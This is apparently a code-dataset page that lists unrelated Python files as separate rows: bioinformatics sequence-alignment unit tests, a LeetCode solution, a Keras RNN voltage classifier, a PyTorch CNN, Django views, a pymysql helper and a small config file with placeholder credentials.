self.assertRaises(IndexError, lambda: s[-1:])
def testIterator(self):
chars = [ str(r.type) for r in self.sequence ]
seq = ''.join(chars)
self.assertEqual(self.sequence.sequence.upper(), seq)
def testToString(self):
self.assertEqual(str(self.sequence), self.data)
self.assertEqual(str(self.sequence), self.data)
def testDump(self):
with self.config.getTempStream() as tmp:
self.sequence.dump(tmp.name)
tmp.flush()
self.assertEqual(open(tmp.name).read().strip(), self.data)
with self.config.getTempStream() as tmp:
self.sequence.dump(tmp)
tmp.flush()
self.assertEqual(open(tmp.name).read().strip(), self.data)
@test.unit
class TestRichSequence(TestSequence):
def setUp(self):
super(TestRichSequence, self).setUp()
self.sequence = sequence.RichSequence.create(self.sequence)
@test.unit
class TestChainSequence(TestSequence):
def setUp(self):
super(TestChainSequence, self).setUp()
from csb.bio.structure import ProteinResidue, Chain
chain = Chain('A', name='desc', accession='accn')
for rank, char in enumerate('AB-CD', start=1):
chain.residues.append(ProteinResidue(rank, char))
self.sequence = sequence.ChainSequence.create(chain)
self.sequence.header = '>id desc'
self.sequence.id = 'id'
@test.unit
class TestSequenceCollection(test.Case):
def setUp(self):
super(TestSequenceCollection, self).setUp()
s1 = sequence.Sequence('id1', '>id1 desc', 'AB-CD', sequence.SequenceTypes.Protein)
s2 = sequence.Sequence('id2', '>id2 desc', 'ABCDE', sequence.SequenceTypes.Protein)
self.collection = sequence.SequenceCollection([s1, s2])
self.data = '>id1 desc\nAB-CD\n>id2 desc\nABCDE'
def testToFASTA(self):
with self.config.getTempStream() as tmp:
self.collection.to_fasta(tmp.name)
tmp.flush()
self.assertEqual(open(tmp.name).read().strip(), self.data)
with self.config.getTempStream() as tmp:
self.collection.to_fasta(tmp)
tmp.flush()
self.assertEqual(open(tmp.name).read().strip(), self.data)
@test.unit
class TestSequenceAlignment(test.Case):
def _factory(self, sequences, strict=True):
return sequence.SequenceAlignment(sequences, strict=strict)
def setUp(self):
super(TestSequenceAlignment, self).setUp()
seq1 = sequence.Sequence('s1', 's1 desc1', 'AB-CD', sequence.SequenceTypes.Protein)
seq2 = sequence.RichSequence('s2', 's2 desc2', list('ABX-D'), sequence.SequenceTypes.Protein)
self.ali = self._factory([seq1, seq2])
self.ali2 = self._factory([seq1, seq2, seq2, seq2], strict=False)
def testAdd(self):
# strict
self.assertRaises(sequence.SequenceError, self.ali.add, sequence.Sequence('sn', 'sn','TOO-LONG-SEQ'))
self.assertRaises(sequence.DuplicateSequenceError, self.ali.add, sequence.Sequence('s1', 's1','AB-CD'))
def testLength(self):
self.assertEqual(self.ali.length, 5)
def testSize(self):
self.assertEqual(self.ali.size, 2)
self.assertEqual(self.ali2.size, 4)
def testSubregion(self):
sub = self.ali.subregion(2, 4)
self.assertEqual(sub.length, 3)
self.assertEqual(sub.size, 2)
self.assertEqual(sub.rows[1].sequence, 'B-C')
self.assertEqual(sub.rows[2].sequence, 'BX-')
self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, -1, 2)
self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, 1, 6)
# should not raise DuplicateSequenceError
self.ali2.subregion(1, 2)
def testFormat(self):
self.assertEqual(self.ali.format(headers=False).strip(), 'AB-CD\nABX-D')
self.assertEqual(self.ali.format(headers=True).strip(), '>s1 desc1\nAB-CD\n>s2 desc2\nABX-D')
def testRows(self):
a = self.ali
self.assertEqual(a.rows[2].id, 's2')
self.assertRaises(sequence.SequenceNotFoundError, lambda i: a.rows[i], -1)
self.assertRaises(sequence.SequenceNotFoundError, lambda i: a.rows[i], 3)
# with duplicates
self.assertEqual(self.ali2.rows['s2'].id, 's2')
self.assertEqual(self.ali2.rows['s2:A1'].id, 's2')
self.assertEqual(self.ali2.rows['s2:A2'].id, 's2')
def testColumns(self):
a = self.ali
self.assertEqual(a.columns[4][0].id, 's1')
self.assertEqual(a.columns[4][0].column, 4)
self.assertEqual(a.columns[4][0].residue.type, sequence.ProteinAlphabet.CYS)
self.assertEqual(len(a.columns[4]), a.size)
self.assertEqual(len(a.columns[4]), len(a.columns[3]))
def testRowColumns(self):
a = self.ali
self.assertEqual(a.rows[1].columns[4].id, a.columns[4][0].id)
self.assertEqual(a.rows[1].columns[4].column, a.columns[4][0].column)
self.assertEqual(a.rows[1].columns[4].residue.type, a.columns[4][0].residue.type)
def testRowResidues(self):
a = self.ali
self.assertEqual(a.rows[1].residues[4].type, sequence.ProteinAlphabet.ASP)
self.assertEqual(a.rows[1].residues[3].type, sequence.ProteinAlphabet.CYS)
self.assertEqual(a.rows[2].residues[4].type, sequence.ProteinAlphabet.ASP)
self.assertEqual(a.rows[2].residues[3].type, sequence.ProteinAlphabet.UNK)
def testRowMap(self):
a = self.ali
self.assertEqual(a.rows[1].map_column(4), 3)
self.assertEqual(a.rows[1].map_residue(3), 4)
def testIndexer(self):
a = self.ali
self.assertEqual(a[0, 0].rows['s1'].id, 's1')
self.assertEqual(a[1, 4].rows['s2'].columns[1].residue.type, sequence.ProteinAlphabet.ASP)
self.assertEqual(a[0, 0].size, 1)
self.assertEqual(a[0, 0].length, 1)
self.assertEqual(a[:, 0].size, 2)
self.assertEqual(a[:, 0].length, 1)
self.assertEqual(a[0, :].size, 1)
self.assertEqual(a[0, :].length, 5)
self.assertEqual(a[0:2, 0:2].size, 2)
self.assertEqual(a[0:2, 0:2].length, 2)
self.assertEqual(a[(0, 1), (0, 1, 3)].size, 2)
self.assertEqual(a[(0, 1), (0, 1, 3)].length, 3)
self.assertRaises(IndexError, lambda: a[-1, :])
self.assertRaises(IndexError, lambda: a[:, -1])
self.assertRaises(TypeError, lambda: a['', :])
self.assertRaises(TypeError, lambda: a[:, ''])
self.assertRaises(ValueError, lambda: a[[], :])
self.assertRaises(ValueError, lambda: a[:, []])
self.assertRaises(IndexError, lambda: a[-1:, :])
self.assertRaises(IndexError, lambda: a[:, -1:])
def testGapAt(self):
self.assertFalse(self.ali.gap_at(1))
self.assertTrue(self.ali.gap_at(3))
@test.unit
class TestA3MAlignmentSimple(TestSequenceAlignment):
def _factory(self, sequences, strict=True):
return sequence.A3MAlignment(sequences, strict=strict)
@test.unit
class TestA3MAlignment(test.Case):
def setUp(self):
super(TestA3MAlignment, self).setUp()
self.file = self.config.getTestFile('d1nz0a_.a3m')
self.a3m = open(self.file).read()
self.ali = sequence.A3MAlignment.parse(self.a3m)
def testMatches(self):
self.assertEqual(self.ali.matches, 109)
def testLength(self):
self.assertEqual(self.ali.length, 135)
def testSize(self):
self.assertEqual(self.ali.size, 9)
def testRows(self):
# row 1 (master)
row = self.ali.rows[1]
self.assertEqual(row.id, 'd1nz0a_')
self.assertEqual(row.length, 135)
self.assertEqual(row.strip().length, 109)
self.assertEqual(row.strip().sequence, 'ERLRLRRDFLLIFKEGKSLQNEYFVVLFRKNGMDYSRLGIVVKRKFGKATRRNKLKRWVREIFRRNKGVIPKGFDIVVIPRKKLSEEFERVDFWTVREKLLNLLKRIEG')
def testToString(self):
self.assertEqual(self.a3m.strip(), self.ali.format().strip())
def testFormat(self):
fasta = self.ali.format(sequence.AlignmentFormats.FASTA, headers=False).splitlines()
self.assertEqual(len(fasta), 9)
for line in fasta:
self.assertEqual(len(line), 135)
ref = open(self.config.getTestFile('d1nz0a_.mfasta')).read()
self.assertEqual(ref.strip(), self.ali.format(sequence.AlignmentFormats.FASTA, headers=True).strip())
def testHMMSubregion(self):
sub = self.ali.hmm_subregion(2, 30)
self.assertEqual(sub.rows['d1nz0a_'].strip().sequence, 'RLRLRRDFLLIFKEGKSLQNEYFVVLFRK')
self.assertEqual(sub.size, self.ali.size)
self.assertEqual(sub.matches, 30 - 2 + 1)
fasta = self.ali.hmm_subregion(1, 109).format(sequence.AlignmentFormats.FASTA, headers=True)
ref = open(self.config.getTestFile('d1nz0a_.mfasta')).read()
self.assertEqual(ref, fasta.strip())
self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, -1, 2)
self.assertRaises(sequence.ColumnPositionError, self.ali.hmm_subregion, -1, 2)
self.assertRaises(sequence.ColumnPositionError, self.ali.subregion, 1, 111110)
self.assertRaises(sequence.ColumnPositionError, self.ali.hmm_subregion, 1, 110)
def testInsertionAt(self):
self.assertFalse(self.ali.insertion_at(1))
self.assertTrue(self.ali.insertion_at(17))
if __name__ == '__main__':
test.Console()
|
23,593 | 6faabcee57f038097a2eba3ecbb56d2cdc777935 | class CallDetail:
def __init__(self, call_from, call_to,duration,call_type):
self.call_from=call_from
self.call_to=call_to
self.duration=duration
self.call_type=call_type
def print_details(self):
print(self.call_from," ",self.call_to," ",self.duration," ",self.call_type)
class Util:
def __init__(self):
self.list_of_call_objects=[]
def parse_customer(self,list_of_call_string):
for i in list_of_call_string:
li=i.split(',')
self.list_of_call_objects.append(CallDetail(li[0],li[1],li[2],li[3]))
def show_list(self):
for i in self.list_of_call_objects:
i.print_details()
call1='9999999999,8888888888,98,STD'
call2='7777777777,6666666666,67,ISD'
call3='1011010101,8855875748,2,Local'
list_of_call_string=[call1,call2,call3]
Obj1=Util()
Obj1.parse_customer(list_of_call_string)
Obj1.show_list() |
23,594 | 7e5e0d58549226abbe4c438fbb2d098792389b12 | #
# @lc app=leetcode.cn id=999 lang=python3
#
# [999] 可以被一步捕获的棋子数
#
# @lc code=start
class Solution:
def numRookCaptures(self, board: List[List[str]]) -> int:
'''
1.找到R的位置
2.向4个方向遍历,找到第一个P,该方向停止遍历
3.找到第一个B,该方向停止遍历
'''
#定义上下左右
dx,dy = [-1,1,0,0],[0,0,-1,1]
x,y,res = 0,0,0
for i in range(8):
for j in range(8):
if board[i][j] == 'R':
#记录位置
x,y = i,j
for i in range(4):
step = 0
while True:
xx = x + step*dx[i]
yy = y + step*dy[i]
if xx<0 or xx>=8 or yy<0 or yy>=8 or board[xx][yy] == 'B':
break
if board[xx][yy] == 'p':
res += 1
break
step += 1
return res
# @lc code=end
|
23,595 | ffd65dbebe9082f3bcb0d9e08180f63ceb3fe681 | # Useful literature:
# The simple RNN chapter of the Time Series Forecasting book
# dimensionality: https://stackoverflow.com/questions/47272351/understanding-simplernn-process
# class weights: https://datascience.stackexchange.com/questions/13490/how-to-set-class-weights-for-imbalanced-classes-in-keras
import pickle
from getROCFn import getROC
import numpy as np
from sklearn.model_selection import train_test_split
############## Functions
def load_obj(name ):
# load pickle object
with open('obj/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
###################
# get the voltage templates for class 0 and class 1
# Load the voltage data
print 'Loading the voltage data from the object file...'
VoltageDataDict = load_obj('VoltageData') # this voltage data dictionary has been generated from the script 'TS3phSimN_2FaultDataSave.py', see it for key format
# crop the data till after fault clearance
print 'Formatting the data to be used by the LR model....'
tme = VoltageDataDict['time']
timestep = tme[1] - tme[0]
#ind_fault_clearance = int(1.31/timestep) # the fault is cleared at this time
ind_fault_clearance = int(0.31/timestep) + 1 # the fault is cleared at this time
ind_fc_1s = int(1.31/timestep) + 1 # one sec after the fault is cleared
ind_line1_outage = int(0.1/timestep) + 5 # time when line 1 is outaged (added 5 time steps to make sure the voltage settles to the new value)
samplevCropped = VoltageDataDict[VoltageDataDict.keys()[0]][ind_fault_clearance:]
# get the input features and the classifications
# make an array of zeros where each row is a sample (cropped) voltage
# in each row, contains all the voltage info after the fault clearance
croppedVArray = np.zeros((len(VoltageDataDict)-1,samplevCropped.shape[0]))
dvdtTarget = np.zeros(len(VoltageDataDict)-1) # the target vector for dvdt classification
k= 0 # row number of croppedVArray
for key in VoltageDataDict:
if key == 'time':
continue
voltage = VoltageDataDict[key]
dv_dt = getROC(voltage,tme)
croppedV = voltage[ind_fault_clearance:]
croppedVArray[k] = croppedV
steadyV = voltage[-100:] # the final 100 samples of the voltage
dv_dtSteady = dv_dt[-100:]
# classify instability according to the rate of change of voltage
highdvdtList = [steadyV[j] for j in range(steadyV.shape[0]) if dv_dtSteady[j] > 0.05] # based only on dv_dt thresholds
if len(highdvdtList) > 10:
dvdtTarget[k] = 1.0
k+=1
# construct a simple RNN model
from keras.models import Sequential
from keras.layers.recurrent import SimpleRNN
from keras.layers.core import Dense, Activation
# define inputs
print 'Partitioning test/train data'
x = croppedVArray[:,:60]
x = np.array(x).reshape((x.shape[0],x.shape[1],1))
y = dvdtTarget
y = np.array(y).reshape((len(y),1))
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.25)
# constructing the model
print 'Constructing model and evaluating...'
batch_size = 100 # if you want to train in batches
model = Sequential()
# output dim refers to the number of delay nodes
model.add(SimpleRNN(units=60,activation="tanh",input_shape=(60,1))) # units: output dim of the SRNN, does not have to be equal to number of features
#model.add(SimpleRNN(60, activation='relu', batch_input_shape=(batch_size, x.shape[1], 1))) # using batches
model.add(Dense(units=1,activation='linear'))
model.compile(loss = 'mean_squared_error',optimizer='sgd')
#model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
#model.fit(x_train, y_train, epochs=10,class_weight = {0:3,1:100}, batch_size = batch_size)
#model.fit(x_train, y_train, epochs=10,class_weight = {0:3,1:100})
model.fit(x_train, y_train, epochs=10)
score_train = model.evaluate(x_train,y_train)
print score_train
# Things to do:
# Get the average accuracy, confusion matrix
# Find out if class weights have any effects
# Try different optimization algorithms
# Test LSTM neural networks
# This link looks interesting: https://machinelearningmastery.com/indoor-movement-time-series-classification-with-machine-learning-algorithms/
|
23,596 | 67091e24c006c21359be08ab9aa60301c0c9e66b | import pymysql
def get_list():
with open("语文湘教版二上(标准版).txt",mode="r",encoding="utf-8") as f:
data = f.read()
print(data)
def insert_many(list):
# 打开数据库连接
db = pymysql.connect(host="192.168.0.168", port=3306, user="root", passwd='001233', db="kuaik", charset="utf8")
# 使用cursor()方法获取游标对象
cursor = db.cursor()
# 使用预处理语句创建表
try:
# 执行sql
sql = "INSERT INTO resource (`id`, `subject`, `publish`, `version`, `grade`, `material`) VALUES (%s,%S,%S,%S,%S,%S)"
cursor.execute(sql,list)
# 提交到数据库执行
db.commit()
except:
# 如果发生错误
db.rollback()
# data1=cursor.fetchone()
# print("DB version is : %s" %data1)
# 关闭连接
db.close()
if __name__ == '__main__':
print(type(get_list())) |
23,597 | 8e751c38e904efd31221748838877179e41e4c20 | import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# FIRST LAYER
self.conv_block_1 = nn.Sequential(nn.Conv2d(in_channels=1,
out_channels=4,
kernel_size=3,
stride=1,
padding=0,
bias=True
), # output size = 26 Receptive field = 3
nn.ReLU()
)
# CONVOLUTION BLOCK
self.conv_block_2 = nn.Sequential(nn.Conv2d(in_channels=4,
out_channels=8,
kernel_size=3,
stride=1,
padding=0,
bias=True), # Output Size = 24, Receptive Field = 5
nn.ReLU()
)
self.conv_block_3 = nn.Sequential(nn.Conv2d(in_channels=8,
out_channels=16,
kernel_size=3,
stride=1,
padding=0,
bias=True), # Output size = 22 Receptive field = 7
nn.ReLU()
)
# TRANSITION BLOCK
self.pool_1 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0) # #Output size = 11 Receptive field = 8
self.conv_block_4 = nn.Sequential(nn.Conv2d(in_channels=16,
out_channels=4,
kernel_size=1,
stride=1,
padding=0,
bias=True), # Output size = 11 Receptive field = 10
nn.ReLU()
)
# CONVOLUTION BLOCK
self.conv_block_5 = nn.Sequential(nn.Conv2d(in_channels=4,
out_channels=8,
kernel_size=3,
stride=1,
padding=0,
bias=True), # Output size = 9 Receptive field = 14
nn.ReLU()
)
self.conv_block_6 = nn.Sequential(nn.Conv2d(in_channels=8,
out_channels=16,
kernel_size=3,
stride=1,
padding=0,
bias=True), # Output size = 7 Receptive field = 18
nn.ReLU()
)
# OUTPUT LAYER
self.conv_block_7 = nn.Sequential(nn.Conv2d(in_channels=16,
out_channels=10,
kernel_size=1,
stride=1,
padding=0,
bias=True), # Output size = 7 Receptive field = 20
nn.ReLU()
)
self.conv_block_8 = nn.Sequential(nn.Conv2d(in_channels=10,
out_channels=10,
kernel_size=7,
stride=1,
padding=0,
bias=True) # Output size = 1 Receptive field = 26
)
def forward(self, x):
x = self.conv_block_1(x)
x = self.conv_block_2(x)
x = self.conv_block_3(x)
x = self.pool_1(x)
x = self.conv_block_4(x)
x = self.conv_block_5(x)
x = self.conv_block_6(x)
x = self.conv_block_7(x)
x = self.conv_block_8(x)
x = x.view(-1, 10)
final_x = F.log_softmax(x, dim=-1)
return final_x
|
23,598 | 5da68f28a2cfc5321fd4fa318f52f42a2241df75 | from django.shortcuts import render
# Create your views here.
def dom(request):
return render(request, 'dom/dom.html')
def showBig(request):
return render(request, 'dom/showBig.html')
def main(request):
return render(request, 'dom/main.html')
def history(reqeust):
return render(reqeust, 'dom/history.html') |
23,599 | ee5a744297582e2ae79f41660cf34da71db946f4 | AUTH_USERNAME='admin'
AUTH_PASSWORD='password'
DOMAIN='yourdomain.com'
DB_FILE='/opt/blinder.db'
TELEGRAM_KEY=''
TELEGRAM_CHAT_ID='' |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.